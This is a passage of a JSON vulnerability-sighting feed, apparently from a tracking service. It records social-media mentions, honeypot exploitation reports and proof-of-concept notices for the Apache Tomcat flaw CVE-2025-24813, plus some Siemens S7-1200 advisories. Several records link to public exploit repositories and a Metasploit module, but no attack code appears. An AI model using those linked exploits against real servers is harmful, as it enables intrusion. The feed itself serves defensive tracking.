"aa8bd7fe-8960-405f-a847-b9fc09b6b9d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lk3g6yvy5227", "content": "", "creation_timestamp": "2025-03-11T06:17:10.784167Z"}, {"uuid": "2addb106-d9db-4900-9e76-607e128b82a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lkzivwzr5ef2", "content": "", "creation_timestamp": "2025-03-23T05:26:38.558543Z"}, {"uuid": "7488576b-198c-46e5-9b13-ab9760b1bd54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3llar3x6hmf2g", "content": "", "creation_timestamp": "2025-03-26T02:40:49.393419Z"}, {"uuid": "8736b3f7-2b16-49a4-879d-1c3a92b3578a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2481", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lkogdku5hc2x", "content": "", "creation_timestamp": "2025-03-18T19:40:18.842691Z"}, {"uuid": "485db8e5-043f-43a7-9701-b43a78e724a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3lks7zx5a742d", "content": "", "creation_timestamp": "2025-03-20T07:58:12.330861Z"}, {"uuid": "08226e9d-a429-4c12-ac2a-3d37eb790702", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/windowsforest.bsky.social/post/3lk3mknajmb2a", "content": "", "creation_timestamp": "2025-03-11T08:11:03.846803Z"}, {"uuid": "bf0396cb-bf2c-4c36-b1bd-8d78ce5ec492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lkmgqeg3k32g", "content": "", "creation_timestamp": "2025-03-18T00:42:08.515118Z"}, {"uuid": "83f6d2b9-8efa-4172-b7ff-c7caccfdda09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/osanpo.bsky.social/post/3lk3rjwx2my2d", "content": "", "creation_timestamp": "2025-03-11T09:40:08.786411Z"}, {"uuid": "abe989a4-7a42-4c8c-8c18-95c11c53e245", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lkfwfe3oxc2x", "content": "", "creation_timestamp": "2025-03-15T10:33:41.208249Z"}, {"uuid": "05591c02-f591-430d-b19d-b3809618970d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lktd6oyve7h2", "content": "", "creation_timestamp": "2025-03-20T18:28:27.920530Z"}, {"uuid": "1c7651cb-35c8-4f92-962f-50a4346162c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4dcyph2fn2", "content": "", "creation_timestamp": "2025-03-24T08:28:19.242266Z"}, {"uuid": "4031fb44-866c-4ea1-ab0c-7ba8346a42ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3lkgcdqlgal23", "content": "", "creation_timestamp": "2025-03-15T14:07:32.037176Z"}, {"uuid": "3a9b9cd3-a734-4ce0-b06e-8adacea97589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/r-netsec.bsky.social/post/3lk6dngxxe22n", "content": "", "creation_timestamp": "2025-03-12T10:09:32.812390Z"}, {"uuid": "60beee73-dd3d-4f16-a8af-95f38da633ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lkdvhyveg22z", "content": "", "creation_timestamp": "2025-03-14T15:12:01.504200Z"}, {"uuid": "2d430fc7-9c34-4663-b7f7-c3046a4d9eee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/rapid7.com/post/3lkqr5pidgs2p", "content": "", "creation_timestamp": "2025-03-19T17:59:15.079307Z"}, {"uuid": "7938538a-7e68-46f4-8d55-ca164f0a8ee2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3lkuyr3k3q22v", "content": "", "creation_timestamp": "2025-03-21T10:26:01.472138Z"}, {"uuid": "69de62c5-cef3-44ff-8773-8be7d65dac13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lk22hs7zke24", "content": "", "creation_timestamp": "2025-03-10T17:14:40.637284Z"}, {"uuid": "0ed76267-e9dd-4ab6-8dfb-0cd992da984d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lk6p6tng3225", "content": "", "creation_timestamp": "2025-03-12T13:36:08.896380Z"}, {"uuid": "ee668561-4f6e-40b4-892e-3cb04a2ec908", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/lordman1982.bsky.social/post/3lkv62ud5dt2f", "content": "", "creation_timestamp": "2025-03-21T12:00:55.630653Z"}, {"uuid": "1f72649f-7dc2-4bd4-8d71-c04da71a824e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/lobsters-feed.bsky.social/post/3lkv7554iyg2a", "content": "", "creation_timestamp": "2025-03-21T12:20:05.168891Z"}, {"uuid": "03fb11b8-948b-461f-95a2-4becd22de47b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lk2cvzrrmf2m", "content": "", "creation_timestamp": "2025-03-10T19:45:49.381190Z"}, {"uuid": "67b3145c-eee2-49c3-9fc8-632f8976a0ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lknowexltc2x", "content": "", "creation_timestamp": "2025-03-18T12:41:19.984330Z"}, {"uuid": "12759965-de6a-4556-8804-3cc75f53d718", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3ll25gfuaxc2x", "content": "", "creation_timestamp": "2025-03-23T11:32:47.471845Z"}, {"uuid": "9bf4f453-211c-420e-9555-eb6a0a4e2e10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3lkpi2bzw5u2g", "content": "", "creation_timestamp": "2025-03-19T05:43:34.480410Z"}, {"uuid": "9d572ef3-cc18-41e5-8297-0ba7201e9369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://mstdn.ca/users/rfwaveio/statuses/114183601892991846", "content": "", "creation_timestamp": "2025-03-18T13:11:41.346652Z"}, {"uuid": "152f0ced-e1b9-4dce-84a4-a252a9396d37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114264205037040699", "content": "", "creation_timestamp": "2025-04-01T18:50:02.911719Z"}, {"uuid": "3ad13047-5574-44ca-badc-5fb2e41d9f7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3llrq3mcnpg2b", "content": "", "creation_timestamp": "2025-04-01T20:37:59.733459Z"}, {"uuid": "c62da3a4-f516-48c8-997c-84a7226d6311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114264205037040699", "content": "", "creation_timestamp": "2025-04-01T18:50:02.915890Z"}, {"uuid": "4f38cff2-4f6b-4489-8821-da0d082747cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llwp4g6y4e2x", "content": "", "creation_timestamp": "2025-04-03T20:03:52.220309Z"}, {"uuid": "2c511da0-6ec5-46ff-a95a-0d9c13c1f869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llwphvkqtn2r", "content": "", "creation_timestamp": "2025-04-03T20:10:17.276291Z"}, {"uuid": "ff6feaa1-ff19-4448-9f8f-083902c221d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lm2frumdbs2g", "content": "", "creation_timestamp": "2025-04-05T07:27:35.524545Z"}, {"uuid": "dc757f6d-aaf6-4fed-a871-3a84bc466964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/royans.bsky.social/post/3lm3slhxup62a", "content": "", "creation_timestamp": "2025-04-05T20:49:17.535870Z"}, {"uuid": "f69f0df3-c483-403c-bc2d-19420e3440b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lm3z6y7p222k", "content": "", "creation_timestamp": "2025-04-05T22:47:35.926696Z"}, {"uuid": "e5454dd1-cb0d-4a34-bfd2-46bc603eec7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "MISP/85904d3b-1b16-528f-8394-ddfd11e0289e", "content": "", "creation_timestamp": "2025-07-03T13:25:46.000000Z"}, {"uuid": "8b001bc7-7a22-4f42-9185-a3ee2225dcb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-24)", "content": "", "creation_timestamp": "2025-11-24T00:00:00.000000Z"}, {"uuid": "e59295a9-27b5-4206-8dbb-b0b82d56da84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb", "content": "", "creation_timestamp": "2025-04-02T21:27:31.000000Z"}, {"uuid": "1628fab5-3cf1-4750-b745-afad9f040c8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-23)", "content": "", "creation_timestamp": "2025-11-23T00:00:00.000000Z"}, {"uuid": "6a5d0fa0-9e82-4fcd-b55c-fc15df70f4fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0395/", "content": "", "creation_timestamp": "2026-04-02T17:00:00.000000Z"}, {"uuid": "5b2ffd54-bd24-40e2-af63-e7ddf5999d39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/46756", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aAutomated scanner + exploit for CVE-2025-24813\nURL\uff1ahttps://github.com/salo-404/firewall\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-06T07:58:07.000000Z"}, {"uuid": "3226edbd-151b-4acd-8752-c07f5d42c917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/36280", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aRemote Code Execution (RCE) vulnerability in Apache Tomcat.\nURL\uff1ahttps://github.com/Eduardo-hardvester/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-10T16:01:14.000000Z"}, {"uuid": "4dcb11ba-24eb-4357-a3e1-78d002ae68a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/41333", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1atomcat CVE-2025-24813 \u53cd\u5e8f\u5217\u5316RCE\u73af\u5883\nURL\uff1ahttps://github.com/x1ongsec/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-06-21T14:26:10.000000Z"}, {"uuid": "1b21eff6-b548-418e-9e1c-c9a986ae18d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/BleepingComputer/21727", "content": "\u200aCritical RCE flaw in Apache Tomcat actively exploited in attacks\n\nA critical remote code execution (RCE) vulnerability in Apache Tomcat tracked as CVE-2025-24813 is actively exploited in the wild, enabling attackers to take over servers with a simple PUT request. [...]\n\nhttps://www.bleepingcomputer.com/news/security/critical-rce-flaw-in-apache-tomcat-actively-exploited-in-attacks/", "creation_timestamp": "2025-03-17T13:55:20.000000Z"}, {"uuid": "774f19fc-cd60-4f9f-8791-e2a2f695877a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/46758", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aAutomated scanner + exploit for CVE-2025-24813\nURL\uff1ahttps://github.com/salo-404/firewall.\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-06T08:06:37.000000Z"}, {"uuid": "3f15ec16-6024-4fd5-9825-e00f59f8ecc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/21709", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aPOC for CVE-2025-24813 using Spring-Boot\nURL\uff1ahttps://github.com/n0n-zer0/Spring-Boot-Tomcat-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-20T22:56:15.000000Z"}, {"uuid": "2adcfbc5-da5b-465c-8a74-8f90d150965e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24812", "type": "seen", "source": "https://t.me/cvedetector/17685", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24812 - Siemens SIMATIC S7-1200 Denial of Service Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24812 \nPublished : Feb. 11, 2025, 11:15 a.m. | 52\u00a0minutes ago \nDescription : A vulnerability has been identified in SIMATIC S7-1200 CPU 1211C AC/DC/Rly (6ES7211-1BE40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1211C DC/DC/DC (6ES7211-1AE40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1211C DC/DC/Rly (6ES7211-1HE40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1212C AC/DC/Rly (6ES7212-1BE40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1212C DC/DC/DC (6ES7212-1AE40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1212C DC/DC/Rly (6ES7212-1HE40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1212FC DC/DC/DC (6ES7212-1AF40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1212FC DC/DC/Rly (6ES7212-1HF40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1214C AC/DC/Rly (6ES7214-1BG40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1214C DC/DC/DC (6ES7214-1AG40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1214C DC/DC/Rly (6ES7214-1HG40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1214FC DC/DC/DC (6ES7214-1AF40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1214FC DC/DC/Rly (6ES7214-1HF40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1215C AC/DC/Rly (6ES7215-1BG40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1215C DC/DC/DC (6ES7215-1AG40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1215C DC/DC/Rly (6ES7215-1HG40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1215FC DC/DC/DC (6ES7215-1AF40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1215FC DC/DC/Rly (6ES7215-1HF40-0XB0) (All versions &lt; V4.7), SIMATIC S7-1200 CPU 1217C DC/DC/DC (6ES7217-1AG40-0XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-2XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-4XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-2XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-4XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-2XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-4XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1212C DC/DC/DC RAIL (6AG2212-1AE40-1XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-2XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-4XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-5XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-2XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-4XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-5XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-2XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-4XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-5XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214C DC/DC/DC RAIL (6AG2214-1AG40-1XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214FC DC/DC/DC (6AG1214-1AF40-5XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1214FC DC/DC/RLY (6AG1214-1HF40-5XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-2XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-4XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-5XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-2XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-4XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-2XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-4XB0) (All versions &lt; V4.7), SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-5XB0) (All versions &lt; V4.7), SIPLUS S7-1200 C[...]", "creation_timestamp": "2025-02-11T13:10:13.000000Z"}, {"uuid": "7562b3a0-b21d-46e4-8e26-0620e7a99473", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24811", "type": "seen", "source": "https://t.me/cvedetector/17695", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24811 - Siemens SIMATIC S7-1200 DoS Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24811 \nPublished : Feb. 11, 2025, 11:15 a.m. | 52\u00a0minutes ago \nDescription : A vulnerability has been identified in SIMATIC S7-1200 CPU 1211C AC/DC/Rly (6ES7211-1BE40-0XB0), SIMATIC S7-1200 CPU 1211C DC/DC/DC (6ES7211-1AE40-0XB0), SIMATIC S7-1200 CPU 1211C DC/DC/Rly (6ES7211-1HE40-0XB0), SIMATIC S7-1200 CPU 1212C AC/DC/Rly (6ES7212-1BE40-0XB0), SIMATIC S7-1200 CPU 1212C DC/DC/DC (6ES7212-1AE40-0XB0), SIMATIC S7-1200 CPU 1212C DC/DC/Rly (6ES7212-1HE40-0XB0), SIMATIC S7-1200 CPU 1212FC DC/DC/DC (6ES7212-1AF40-0XB0), SIMATIC S7-1200 CPU 1212FC DC/DC/Rly (6ES7212-1HF40-0XB0), SIMATIC S7-1200 CPU 1214C AC/DC/Rly (6ES7214-1BG40-0XB0), SIMATIC S7-1200 CPU 1214C DC/DC/DC (6ES7214-1AG40-0XB0), SIMATIC S7-1200 CPU 1214C DC/DC/Rly (6ES7214-1HG40-0XB0), SIMATIC S7-1200 CPU 1214FC DC/DC/DC (6ES7214-1AF40-0XB0), SIMATIC S7-1200 CPU 1214FC DC/DC/Rly (6ES7214-1HF40-0XB0), SIMATIC S7-1200 CPU 1215C AC/DC/Rly (6ES7215-1BG40-0XB0), SIMATIC S7-1200 CPU 1215C DC/DC/DC (6ES7215-1AG40-0XB0), SIMATIC S7-1200 CPU 1215C DC/DC/Rly (6ES7215-1HG40-0XB0), SIMATIC S7-1200 CPU 1215FC DC/DC/DC (6ES7215-1AF40-0XB0), SIMATIC S7-1200 CPU 1215FC DC/DC/Rly (6ES7215-1HF40-0XB0), SIMATIC S7-1200 CPU 1217C DC/DC/DC (6ES7217-1AG40-0XB0), SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-2XB0), SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-4XB0), SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-2XB0), SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-4XB0), SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-2XB0), SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-4XB0), SIPLUS S7-1200 CPU 1212C DC/DC/DC RAIL (6AG2212-1AE40-1XB0), SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-2XB0), SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-4XB0), SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-5XB0), SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-2XB0), SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-4XB0), SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-5XB0), SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-2XB0), SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-4XB0), SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-5XB0), SIPLUS S7-1200 CPU 1214C 